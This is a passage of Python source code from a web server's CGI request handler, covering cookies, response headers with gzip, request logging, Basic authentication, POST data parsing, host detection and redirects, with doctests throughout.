>>> handler.send_cookie('') # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.send_cookie('key=value;a=1') # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.send_cookie({}) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> if sys.version_info.major < 3:
... handler.send_cookie(
... {str('key'): str('value'), str('a'): 1}
... ) # doctest: +ELLIPSIS
... else:
... handler.send_cookie({'key': 'value', 'a': 1})
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> cookie = cookies.SimpleCookie()
>>> if sys.version_info.major < 3:
... cookie[str('key')] = str('value')
... cookie[str('a')] = 1
... else:
... cookie['key'] = 'value'
... cookie['a'] = 1
>>> handler.send_cookie(cookie) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
'''
if not builtins.isinstance(cookie, cookies.SimpleCookie):
cookie_object = cookies.SimpleCookie()
# # python3.5
# # if builtins.isinstance(cookie, builtins.str):
if builtins.isinstance(cookie, (
builtins.unicode, builtins.str
)):
# #
cookie_object.load(cookie_object)
else:
for key, value in cookie.items():
# # python3.5 cookie_object[key] = value
cookie_object[convert_to_string(key)] = value
cookie = cookie_object
expires = self.date_time_string(time.time() + maximum_age_in_seconds)
cookie = regularExpression.compile('^[^:]+: *').sub(
'', cookie.output()
) + (
';version="%s";expires=%s;Max-Age=%d;Path=%s;comment=%s;'
'domain=%s%s%s' % (
builtins.str(version), expires, maximum_age_in_seconds, path,
comment, domain, ';secure' if secure else '',
';httponly' if httponly else ''))
if not __test_mode__:
self.send_response(response_code).send_header(header, cookie)
return self
@JointPoint
# # python3.5
# # def send_content_type_header(
# # self: Self, mime_type='text/html', encoding=None,
# # response_code=200
# # ) -> Self:
def send_content_type_header(
self, mime_type='text/html', encoding=None, response_code=200
):
# #
'''
Sends a content type header to client if not sent yet.
**mime_type** - Mime type to send to client.
**encoding** - Encoding description to send to client.
**response_code** - HTTP Response code to send.
Additional arguments and keywords will be forwarded to \
"self.send_header()" method.
'''
if not (self.content_type_sent or __test_mode__):
self.content_type_sent = True
self.send_response(response_code)
charset = ''
# TODO check new branch
if encoding is None:
charset = '; charset=%s' % self.server.web.encoding.replace(
'_', '-')
# # python3.5
# # elif builtins.isinstance(encoding, builtins.str):
elif builtins.isinstance(encoding, (
builtins.unicode, builtins.str
)):
# #
charset = '; charset=%s' % encoding.replace('_', '-')
self.send_header('Content-Type', '%s%s' % (mime_type, charset))
return self
@JointPoint
# # python3.5
# # def send_content_length_header(
# # self: Self, size: builtins.int, dynamic_output='',
# # response_code=200
# # ) -> Self:
def send_content_length_header(
self, size, dynamic_output='', response_code=200
):
# #
'''
Sends the content length header to client if not sent yet.
**size** - Content length to send.
**dynamic_output** - Indicates whether output should be forced to \
compressed because it is simply a computed \
string.
**response_code** - HTTP Response code to send.
'''
if not (self.content_length_sent or __test_mode__):
self.content_length_sent = True
self.send_response(response_code)
threshold = self.server.web.file_size_stream_threshold_in_byte
# # python3.5
# # if(size < threshold and
# # 'accept-encoding' in self.headers and
# # gzip.__name__ in self.headers.get('accept-encoding').split(
# # ','
# # ) and (dynamic_output or Iterable(
# # self.server.web.compressible_mime_type_pattern
# # ).is_in_pattern(value=self.requested_file.mime_type))):
if(size < threshold and
self.headers.get('accept-encoding', False) and
gzip.__name__ in builtins.map(
lambda name: convert_to_unicode(name), self.headers.get(
'accept-encoding'
).split(',')
) and (dynamic_output or Iterable(
self.server.web.compressible_mime_type_pattern
).is_in_pattern(value=self.requested_file.mime_type))):
# #
self.send_header('Content-Encoding', gzip.__name__)
if dynamic_output:
self._encoded_output = self._gzip(content=dynamic_output)
else:
self._encoded_output = self._gzip(
content=self.requested_file.get_content(mode='rb'))
self.send_header('Content-Length', builtins.len(
self._encoded_output))
else:
self.send_header('Content-Length', size)
return self
@JointPoint
# # python3.5
# # def log_message(
# # self: Self, format: builtins.str,
# # message_or_error_code: (builtins.int, builtins.str),
# # response_code_or_message: (builtins.str, builtins.int),
# # message_end=None
# # ) -> Self:
def log_message(
self, format, message_or_error_code, response_code_or_message,
message_end=None
):
# #
'''
Wrapper method for all logging output coming through the server \
thread.
**format** - Logging format. Allowed \
placeholder are: "client_ip", \
"client_port", \
"request_description", \
"response_code", "forwarded_ip", \
"forwarded_host", \
"forwarded_server", \
"forwarded_server" and \
"server_port".
**message_or_error_code** - Logging message or resulting HTTP \
code.
**response_code_or_message** - Resulting HTTP code or response \
message.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.client_address = '192.168.0.1', 80
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...'
>>> handler.log_message('', 404, '') # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...404...'
>>> handler.server.web.__class__.instances = [handler.server.web]
>>> handler.log_message('', 404, '') # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.log_message('', '', 404) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('key: value'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('key', 'value')
>>> # #
>>> handler.log_message('', '', 404) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(String(
... 'x-forwarded-for: 192.168.0.1\\n'
... 'x-forwarded-host: 192.168.0.1\\n'
... 'x-forwarded-server: 192.168.0.1'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header(
... 'x-forwarded-for', '192.168.0.1')
... handler.headers.add_header(
... 'x-forwarded-host', '192.168.0.1')
... handler.headers.add_header(
... 'x-forwarded-server', '192.168.0.1')
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...'
>>> handler.log_message('', '', 404) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...192.168.0.1:80 -> ...404... - forwarded for: 192.168.0.1 - ...
'''
format = (
'{client_ip}:{client_port} {request_description} -> '
'%s{response_code}%s')
forwarded_ip = forwarded_host = forwarded_server = None
if 'headers' in self.__dict__:
# # python3.5
# # forwarded_ip = self.headers.get('x-forwarded-for')
# # forwarded_host = self.headers.get('x-forwarded-host')
# # forwarded_server = self.headers.get('x-forwarded-server')
forwarded_ip = self.headers.get('x-forwarded-for')
forwarded_host = self.headers.get('x-forwarded-host')
forwarded_server = self.headers.get('x-forwarded-server')
# #
'''
NOTE: We habe to save the scope here to forwarded it into the \
function since it will be determined by introspection.
'''
scope = builtins.locals()
for header_name in builtins.filter(
lambda header_name: scope[header_name], (
'forwarded_ip', 'forwarded_host', 'forwarded_server'
)
):
scope[header_name] = convert_to_unicode(scope[header_name])
format += ' - forwarded for: {%s}' % header_name
if builtins.len(self.server.web.__class__.instances) > 1:
format += ' (server port: {server_port})'
request_description = message_or_error_code
response_code = response_code_or_message
if builtins.isinstance(message_or_error_code, builtins.int):
request_description = response_code_or_message
response_code = message_or_error_code
# # python3.5
# # if builtins.isinstance(request_description, builtins.bytes):
# # # TODO check branch
# # request_description = '...bytes...'
if builtins.isinstance(request_description, builtins.str):
try:
request_description = convert_to_unicode(
request_description)
except builtins.UnicodeDecodeError:
request_description = '...bytes...'
# #
color_wrapper = self._determine_logging_color(response_code)
__logger__.info((format % color_wrapper).format(
client_ip=self.client_address[0],
client_port=self.client_address[1],
request_description=request_description,
response_code=response_code, forwarded_ip=forwarded_ip,
forwarded_host=forwarded_host, forwarded_server=forwarded_server,
server_port=self.server.web.port))
return self
@JointPoint
# # python3.5
# # def setup(
# # self: Self, *arguments: builtins.object,
# # **keywords: builtins.object
# # ) -> None:
def setup(self, *arguments, **keywords):
# #
'''
This method wraps the python's native request handler to provide \
our wrapped file socket buffer.
'''
'''Take this method via introspection.'''
result = builtins.getattr(
builtins.super(self.__class__, self), inspect.stack()[0][3]
)(*arguments, **keywords)
self.rfile = self.server.web.service.read_file_socket
return result
@JointPoint
# # python3.5
# # def create_environment_variables(self: Self) -> builtins.str:
def create_environment_variables(self):
# #
'''Creates all request specified environment-variables.'''
# # python3.5
# # self._determine_host().uri = self.external_uri = self.path
self._determine_host().uri = self.external_uri = \
convert_to_unicode(self.path)
# #
self._handle_redirect(external=False)
# # python3.5
# # match = regularExpression.compile(
# # '[^/]*/+(?P<path>.*?)(?:{delimiter}(?P<parameter>.*))?'.format(
# # delimiter=self.server.web.request_parameter_delimiter)
# # ).fullmatch(self.uri)
match = regularExpression.compile(
'[^/]*/+(?P<path>.*?)'
'(?:{delimiter}(?P<parameter>.*))?$'.format(
delimiter=self.server.web.request_parameter_delimiter)
).match(self.uri)
# #
self.path = ''
if match:
# # python3.5
# # self.path = posixpath.normpath(unquote_url(match.group(
# # 'path')))
self.path = convert_to_unicode(posixpath.normpath(unquote_url(
convert_to_string(match.group('path')))))
# #
if self.path == '.':
self.path = ''
self.parameter = match.group('parameter')
self.requested_file = FileHandler(
location=self.server.web.root.path + self.path)
self._authentication_location = self.server.web.root
if self.requested_file:
self._authentication_location = self.requested_file
if self.requested_file.is_file():
self._authentication_location = self.requested_file.directory
cookie_handler = self.get_cookie()
if cookie_handler is not None:
for key, morsel in cookie_handler.items():
self.cookie[key] = morsel.value
self.get = self.parse_url(self.uri)[1]
# #
return self.path
# # endregion
# # region protected
# # # region boolean
@JointPoint
# # python3.5 def _is_authenticated(self: Self) -> builtins.tuple:
def _is_authenticated(self):
'''
Determines whether current request is authenticated via a tuple. \
First item determines if authentication has success and \
second item determines html content to send if authentication \
fails and "None" if nothing should be sent automatically.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('test: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler._authentication_location = __test_folder__
>>> handler._is_authenticated()
(True, None)
>>> file = FileHandler(
... __test_folder__.path + '_is_authenticated',
... make_directory=True)
>>> handler.path = '/' + file.name
>>> handler.create_environment_variables()
'_is_authenticated'
>>> handler._is_authenticated()
(True, None)
>>> FileHandler(file.path + '.htpasswd').content = 'login:password'
>>> handler.path = '/' + file.name
>>> handler.create_environment_variables()
'_is_authenticated'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('key: value'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('key', 'value')
>>> # #
>>> handler._is_authenticated()
(False, None)
>>> handler.server.web.authentication_file_name = ''
>>> handler._is_authenticated()
(True, None)
>>> handler.server.web.authentication = False
>>> handler._is_authenticated()
(True, None)
'''
if self.server.web.authentication:
while self.server.web.authentication_file_name:
file_path = (
self._authentication_location.path +
self.server.web.authentication_file_name)
authentication_file = FileHandler(location=file_path)
if authentication_file:
return (
# # python3.5
# # self.headers.get('authorization') ==
# # 'Basic %s' % self._get_login_data(
# # authentication_file
# # ), None)
convert_to_unicode(self.headers.get(
'authorization'
)) == 'Basic %s' % self._get_login_data(
authentication_file
), None)
# #
if self._authentication_location == self.server.web.root:
break
self._authentication_location = \
self._authentication_location.directory
# # python3.5
# # login_data_match = regularExpression.compile(
# # '(?P<name>[^:]+):(?P<password>.+)$'
# # ).match(base64_decode(
# # self.headers.get('authorization', '')[builtins.len(
# # 'Basic '
# # ):]
# # ).decode(self.server.web.encoding))
login_data_match = regularExpression.compile(
'(?P<name>[^:]+):(?P<password>.+)$'
).match(base64_decode(self.headers.get(
'authorization', ''
)[builtins.len('Basic '):]))
# #
login_data = None
if login_data_match:
login_data = {
'name': login_data_match.group('name'),
'password': login_data_match.group('password')}
if self.server.web.authentication_handler is not None:
return self.server.web.authentication_handler(login_data, self)
return True, None
@JointPoint
# # python3.5 def _is_valid_reference(self: Self) -> builtins.bool:
def _is_valid_reference(self):
'''
Checks whether the requested is one of a python module-, static- \
or dynamic file request. Returns "True" if so and "False" \
otherwise.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.requested_file = FileHandler(
... __test_folder__.path + '_is_valid_reference')
>>> handler.path = handler.requested_file.name
>>> handler._is_valid_reference()
False
>>> handler.requested_file.make_directory()
True
>>> handler._is_valid_reference()
True
>>> handler.requested_file = FileHandler(
... handler.requested_file.path +
... handler.server.web.authentication_file_name)
>>> handler.requested_file.content = 'hans:hans'
>>> handler._is_valid_reference()
False
>>> handler.requested_file = None
>>> handler.server.web.module_loading = True
>>> handler.path = 'doctest'
>>> handler._is_valid_reference()
True
'''
if((self.server.web.module_loading is True or
self.server.web.module_loading == self.path) and (
(self.path == '__main__' and __name__ != '__main__') or
Module.get_file_path(context_path=self.path))
):
self.load_module = True
return True
elif self.requested_file:
if self._is_valid_requested_file():
return True
return False
@JointPoint
# # python3.5 def _is_valid_requested_file(self: Self) -> builtins.bool:
def _is_valid_requested_file(self):
'''Determines if the current requested file points to a valid file.'''
patterns = self.server.web.dynamic_mime_type_pattern + \
self.server.web.static_mime_type_pattern
return (
self.requested_file.is_file() and self.requested_file.name !=
self.server.web.authentication_file_name and Iterable(
patterns
).is_in_pattern(
value=self.requested_file.mime_type
) is not False or self.server.web.directory_listing and
self.requested_file.is_directory())
@JointPoint
# # python3.5 def _is_dynamic(self: Self) -> builtins.bool:
def _is_dynamic(self):
'''
Determines if the current request points to a dynamic executable \
file or is a static type which should be send back unmodified.
'''
return builtins.bool(self.load_module or Iterable(
self.server.web.dynamic_mime_type_pattern
).is_in_pattern(value=self.requested_file.mime_type))
# # # endregion
@JointPoint
# # python3.5
# # def _determine_logging_color(
# # self: Self, response_code: builtins.int
# # ) -> builtins.tuple:
def _determine_logging_color(self, response_code):
# #
'''
Determines a start and stop console escape sequence to mark given \
http status code with a suitable color.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler._determine_logging_color(100)
('', '')
>>> handler._determine_logging_color(200) == (
... '\\x1b[32m', '\\x1b[0m')
True
>>> handler._determine_logging_color(300) == (
... '\\x1b[34m', '\x1b[0m')
True
>>> handler._determine_logging_color(400) == (
... '\\x1b[33m', '\x1b[0m')
True
>>> handler._determine_logging_color(500) == (
... '\\x1b[31m', '\\x1b[0m')
True
'''
longest_match = 0
color_wrapper = '', ''
for status_code_prefix, output_color in (
self.server.web.STATUS_PREFIX_CODE_LOGGING_COLOR_MAPPING.items()
):
if longest_match < builtins.len(builtins.str(
status_code_prefix
)) and builtins.str(response_code).startswith(builtins.str(
status_code_prefix
)):
color_wrapper = (
SET_OUTPUT_ATTRIBUTE_MODE % output_color,
SET_OUTPUT_ATTRIBUTE_MODE % RESET_OUTPUT_ATTRIBUTE_MODE)
longest_match = builtins.len(builtins.str(status_code_prefix))
return color_wrapper
@JointPoint
# # python3.5
# # def _do_data_request(self: Self, type: builtins.str) -> Self:
def _do_data_request(self, type):
# #
'''Is triggered if a special request is coming.'''
self.type = type[builtins.len('do_'):].lower()
# # python3.5
# # self.data_type, post_data = cgi.parse_header(
# # self.headers.get_content_type())
self.data_type, post_data = cgi.parse_header(
self.headers.gettype())
# #
content_length = builtins.int(self.headers.get('content-length', 0))
if not __test_mode__:
if self.data_type == 'application/x-www-form-urlencoded':
# # python3.5
# # self.data = parse_url_query(self.rfile.read(
# # content_length
# # ).decode(self.server.web.encoding))
self.data = cgi.parse_qs(
self.rfile.read(content_length),
keep_blank_values=True)
# #
for name, value in builtins.filter(
lambda item: Object(content=item[1]).is_binary(),
self.data.items()
):
self.data[name] = {'content': value}
elif self.data_type == 'multipart/form-data':
self.data = self._determine_data()
else:
'''NOTE: We could only ready data once from buffer.'''
content = self.rfile.read(content_length)
if self.data_type in ['application/json', 'text/plain']:
try:
# # python3.5
# # self.data = json.loads(content).decode(
# # self.server.web.encoding)
self.data = json.loads(
content, encoding=self.server.web.encoding)
# #
except builtins.ValueError:
self.data = {
'type': self.data_type, 'content': content}
else:
self.data = {'type': self.data_type, 'content': content}
# # python3.5
# # pass
if builtins.isinstance(self.data, builtins.dict):
self.data = Dictionary(self.data).convert(
key_wrapper=lambda key, value: convert_to_unicode(
key
) if builtins.isinstance(key, builtins.str) else key,
value_wrapper=lambda key, value: convert_to_unicode(
value
) if builtins.isinstance(key, builtins.str) else value
).content
else:
for key, value in builtins.enumerate(self.data):
self.data[key] = Dictionary(value).convert(
key_wrapper=lambda key, value: convert_to_unicode(
key
) if builtins.isinstance(
key, builtins.str
) else key, value_wrapper=lambda key, value: \
convert_to_unicode(
value
) if builtins.isinstance(
key, builtins.str
) else value
).content
# #
return self.do_GET()
@JointPoint
# # python3.5
# # def _get_login_data(
# # self: Self, authentication_file: FileHandler
# # ) -> builtins.str:
def _get_login_data(self, authentication_file):
# #
'''Determines needed login data for current request.'''
__logger__.info(
'Use authentication file "%s".', authentication_file._path)
# # python3.5
# # match = regularExpression.compile(
# # self.server.web.authentication_file_content_pattern
# # ).fullmatch(authentication_file.content.strip())
# # return base64_encode(('%s:%s' % (
# # match.group('name'), match.group('password')
# # )).encode(self.server.web.encoding)).decode(
# # self.server.web.encoding)
match = regularExpression.compile(
'(?:%s)$' % self.server.web.authentication_file_content_pattern
).match(authentication_file.content.strip())
return base64_encode(
'%s:%s' % (match.group('name'), match.group('password')))
# #
@JointPoint
# # python3.5 def _determine_data(self: Self) -> builtins.dict:
def _determine_data(self):
'''
Determines the post values given by an html form. File uploads \
are includes as bytes.
'''
# # python3.5
# # form = cgi.FieldStorage(
# # fp=self.rfile, headers=self.headers, keep_blank_values=True,
# # strict_parsing=True,
# # environ=self._determine_environment_variables(),
# # encoding=self.server.web.encoding)
form = cgi.FieldStorage(
fp=self.rfile, headers=self.headers, keep_blank_values=True,
strict_parsing=True,
environ=self._determine_environment_variables())
# #
data = {}
for name in form:
data[name] = []
if builtins.hasattr(form[name], 'file') and form[name].filename:
data[name].append(form[name])
elif builtins.isinstance(form[name], builtins.list):
for value in form[name]:
if builtins.hasattr(value, 'file') and value.filename:
data[name].append(value)
else:
data[name].append(value.value)
else:
data[name].append(form[name].value)
return data
@JointPoint
# # python3.5
# # def _determine_environment_variables(self: Self) -> os._Environ:
def _determine_environment_variables(self):
# #
'''
Determines all needed environment variables needed to determine \
given post data with cgi module.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('content-type: text/plain'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('content-type', 'text/plain')
>>> # #
>>> handler.command = ''
>>> dict(
... handler._determine_environment_variables()
... ) # doctest: +ELLIPSIS
{'...': '...'}
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(String(
... 'accept: text/plain\\nContent-Type: text/plain'
... ), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('accept', 'text/plain')
>>> # #
>>> dict(
... handler._determine_environment_variables()
... ) # doctest: +ELLIPSIS
{'...': '...'}
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(String(
... 'cookie: hans=peter'
... ), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('cookie', 'hans=peter')
>>> # #
>>> dict(
... handler._determine_environment_variables()
... ) # doctest: +ELLIPSIS
{'...': '...'}
'''
accept = []
if 'accept' in self.headers:
for line in self.headers['accept'].split('\n'):
accept += line.split(',')
variables = deepcopy(os.environ)
# # python3.5
# # variables.update({
# # 'HTTP_ACCEPT': ','.join(accept),
# # 'REQUEST_METHOD': self.command,
# # 'CONTENT_TYPE': self.headers.get_content_type(),
# # 'QUERY_STRING': self.parameter,
# # 'REMOTE_HOST': self.host,
# # 'CONTENT_LENGTH': self.headers.get('content-length', '0'),
# # 'HTTP_USER_AGENT': convert_to_unicode(self.headers.get(
# # 'user-agent', '')),
# # 'HTTP_COOKIE': convert_to_unicode(self.headers.get(
# # 'cookie', '')),
# # 'HTTP_REFERER': convert_to_unicode(self.headers.get(
# # 'referer', ''))
# # })
variables.update({
'HTTP_ACCEPT': ','.join(accept),
'REQUEST_METHOD': self.command,
'CONTENT_TYPE': convert_to_unicode(self.headers.get(
'content-type', 'text/plain')),
'QUERY_STRING': self.parameter,
'REMOTE_HOST': self.host,
'CONTENT_LENGTH': convert_to_unicode(self.headers.get(
'content-length', 0)),
'HTTP_USER_AGENT': convert_to_unicode(self.headers.get(
'user-agent', '')),
'HTTP_COOKIE': convert_to_unicode(self.headers.get(
'cookie', '')),
'HTTP_REFERER': convert_to_unicode(self.headers.get(
'referer', ''))
})
# #
for variable_name in variables:
# # python3.5
# # if variable_name.replace('_', '-').lower() in self.headers:
# # variables[variable_name] = self.headers.get(
# # variable_name.replace('_', '-').lower())
# # cookie_content = ', '.join(builtins.filter(
# # None, self.headers.get_all('cookie', [])))
# # if cookie_content:
# # variables['HTTP_COOKIE'] = cookie_content
if self.headers.get(
variable_name.replace('_', '-').lower(), False
):
variables[variable_name] = convert_to_unicode(
self.headers.get(variable_name.replace(
'_', '-').lower()))
# #
return variables
@JointPoint
# # python3.5
# # def _send_no_authorization_error(self: Self, output=None) -> Self:
def _send_no_authorization_error(self, output=None):
# #
'''This method is called if authentication failed.'''
self.send_response(401)
message = 'You request a protected location'
# # python3.5
# # if 'authorization' in self.headers:
if self.headers.get('authorization', False):
# #
message = 'Requested authentication failed'
if not __test_mode__:
self.send_header(
'WWW-Authenticate', 'Basic realm=\"%s\"' % message)
self.send_header(
'Content-Type',
'text/html; charset=%s' % self.server.web.encoding)
self.end_headers()
return self._send_output(output)
@JointPoint
# # python3.5
# # def _send_no_file_error(
# # self: Self, valid_request=True, debug=False
# # ) -> Self:
def _send_no_file_error(self, valid_request=True, debug=False):
# #
'''
Generates a http-404-error if no useful file was found for \
responding.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.path = '/'
>>> handler.requested_file = __test_folder__
>>> handler._send_no_file_error(debug=True) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.server.web.module_loading = ''
>>> handler._send_no_file_error(debug=True) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.server.web.module_loading = True
>>> handler._send_no_file_error(debug=True) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.path = ''
>>> handler._send_no_file_error(debug=True) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.requested_file = FileHandler(
... __test_folder__.path + '_send_no_file_error')
>>> handler.requested_file.content = ''
>>> handler._send_no_file_error(
... False, debug=True
... ) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
'''
error_message = 'Requested file not found'
if __logger__.isEnabledFor(logging.DEBUG) or sys.flags.debug or debug:
error_message = (
'Eather none of the following default module names "%s" nor '
'none of the following default file name pattern "%s" found' %
('", "'.join(self.server.web.default_module_names),
'", "'.join(self.server.web.default_file_name_pattern)))
if builtins.isinstance(
self.server.web.module_loading, builtins.str
):
error_message = (
'Eather default module name "%s" nor none of the following'
' default file name pattern "%s" found' % (
self.server.web.module_loading, '", "'.join(
self.server.web.default_file_name_pattern)))
elif not self.server.web.module_loading:
error_message = (
'None of the following default file name pattern "%s" '
'found' % '", "'.join(
self.server.web.default_file_name_pattern))
if self.path:
error_message = ('No accessible file "%s" found' % FileHandler(
location=self.server.web.root.path + self.path
)._path)
if not valid_request:
error_message = (
"Given request isn't valid. Check your white- and "
'blacklists')
if self.requested_file.is_file():
error_message += \
'. Detected mime-type "%s"' % self.requested_file.mime_type
self.send_error(404, regularExpression.compile('\n+').sub(
'\n', error_message))
return self
@JointPoint
# # python3.5 def _is_valid_request(self: Self) -> builtins.bool:
def _is_valid_request(self):
'''Checks if given request fulfills all restrictions.'''
return self._request_in_pattern_list(
self.server.web.request_whitelist
) and not self._request_in_pattern_list(
self.server.web.request_blacklist)
@JointPoint
# # python3.5
# # def _request_in_pattern_list(
# # self: Self, pattern_list: NativeIterable
# # ) -> builtins.bool:
def _request_in_pattern_list(self, pattern_list):
# #
'''Checks if current request matches on of the given pattern.'''
# # python3.5
# # patterns = regularExpression.compile(
# # '(?P<type>.+?):(?P<uri>.*)')
patterns = regularExpression.compile(
'^(?P<type>.+?):(?P<uri>.*)$')
# #
type_uppercase = self.external_type.upper()
for pattern in pattern_list:
# # python3.5 match = patterns.fullmatch(pattern)
match = patterns.match(pattern)
types = match.group('type').split('|')
# # python3.5
# # if(type_uppercase in types or
# # '*' in types
# # ) and regularExpression.compile(match.group(
# # 'uri'
# # )).fullmatch(self.external_uri) is not None:
if(type_uppercase in types or
'*' in types
) and regularExpression.compile('(?:%s)$' % match.group(
'uri'
)).match(self.external_uri) is not None:
# #
return True
return False
@JointPoint
# # python3.5 def _determine_host(self: Self) -> Self:
def _determine_host(self):
'''
Determines the full host name with port included (if it's not \
"80").
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.server.web.host_name = 'test'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(String(
... 'test: hans'
... ), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler.server.web.port = 80
>>> handler._determine_host() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.host
'test'
>>> handler.server.web.port = 8080
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(String(
... 'accept: text/plain'
... ), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('accept', 'text/plain')
>>> # #
>>> handler._determine_host() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.host
'test:8080'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('x-forwarded-host: hans\\nHost: hans'),
... seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('x-forwarded-host', 'hans')
... handler.headers.add_header('host', 'hans')
>>> # #
>>> handler._determine_host() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.host
'hans'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('Host: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('host', 'hans')
>>> # #
>>> handler._determine_host() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.host
'hans'
'''
self.host = self.server.web.host_name
if self.server.web.port != 80:
self.host += ':%d' % self.server.web.port
# # python3.5
# # if 'x-forwarded-host' in self.headers:
# # self.host = self.headers.get('x-forwarded-host')
# # elif 'host' in self.headers:
# # self.host = self.headers.get('host')
if self.headers.get('x-forwarded-host', False):
self.host = convert_to_unicode(self.headers.get(
'x-forwarded-host'))
elif self.headers.get('host', False):
self.host = convert_to_unicode(self.headers.get('host'))
# #
return self
@JointPoint
# # python3.5
# # def _handle_redirect(self: Self, external=True) -> builtins.bool:
def _handle_redirect(self, external=True):
# #
'''
Deals with specified redirects. External Redirects will send an \
http redirection code.
'''
# # python3.5
# # patterns = regularExpression.compile(
# # '(?P<type>.+?):(?P<uri>.*)')
patterns = regularExpression.compile(
'(?P<type>.+?):(?P<uri>.*)$')
# #
type_uppercase = self.type.upper()
redirects = self.server.web.internal_redirects
if external:
redirects = self.server.web.external_redirects
for source, target in redirects:
# # python3.5 source_match = patterns.fullmatch(source)
source_match = patterns.match(source)
types = source_match.group('type').split('|')
# # python3.5
# # pattern = regularExpression.compile(source_match.group('uri'))
# # if(type_uppercase in types or
# # '*' in types
# # ) and pattern.fullmatch(
# # self.external_uri) is not None:
pattern = regularExpression.compile(
'(?:%s)$' % source_match.group('uri'))
if(type_uppercase in types or
'*' in types
) and pattern.match(self.external_uri) is not None:
# #
self._handle_matched_redirect(
pattern, patterns, target, external)
return True
return False
@JointPoint
# # python3.5
# # def _handle_matched_redirect(
# # self: Self, pattern: builtins.type(regularExpression.compile('')),
# # patterns: builtins.type(regularExpression.compile('')),
# # target: builtins.str, external: builtins.bool
# # ) -> Self:
